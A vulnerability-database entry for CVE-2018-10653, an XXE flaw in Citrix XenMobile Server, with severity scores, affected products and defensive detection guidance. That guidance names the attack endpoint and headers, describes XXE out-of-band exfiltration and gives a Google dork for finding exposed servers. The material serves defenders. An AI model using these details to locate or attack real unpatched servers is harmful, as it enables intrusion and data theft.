cbcvebase.
CVE-2018-10653
published 2018-05-23

CVE-2018-10653: There is an XML External Entity (XXE) Processing Vulnerability in Citrix XenMobile Server 10.8 before RP2 and 10.7 before RP3.

PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
6.80%
93.2th percentile
There is an XML External Entity (XXE) Processing Vulnerability in Citrix XenMobile Server 10.8 before RP2 and 10.7 before RP3.

Affected

9 ranges
VendorProductVersion rangeFixed in
citrixcitrix_adm
citrixcitrix_hypervisor
citrixcitrix_virtual_apps_and_desktops
citrixendpoint_management
citrixnetscaler_adc
citrixnetscaler_gateway
citrixxenmobile_server
citrixxenmobile_server
citrixxenserver

Detection & IOCsextracted from sources · hover to see the quote

url/zdm/ios/mdm
uaMDM/1.0
otherapplication/x-apple-aspen-mdm
  • Monitor for HTTP PUT requests to the /zdm/ios/mdm endpoint with Content-Type 'application/x-apple-aspen-mdm' and User-Agent 'MDM/1.0', which is the attack vector used in this XXE exploit.
  • Inspect XML payloads sent to /zdm/ios/mdm for DOCTYPE declarations and external entity references (XXE), which are the mechanism of exploitation.
  • Google dork 'inurl:zdm logon' can be used to identify exposed XenMobile instances; monitor for reconnaissance activity matching this pattern against your infrastructure.
  • Watch for outbound DNS/HTTP callbacks from the XenMobile server to external webhook or attacker-controlled URLs, indicative of successful XXE out-of-band data exfiltration.
  • ·The vulnerability affects XenMobile Server 10.8 before RP2 and 10.7 before RP3. Ensure patched versions (10.8 RP2+ or 10.7 RP3+) are deployed before relying solely on detection.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.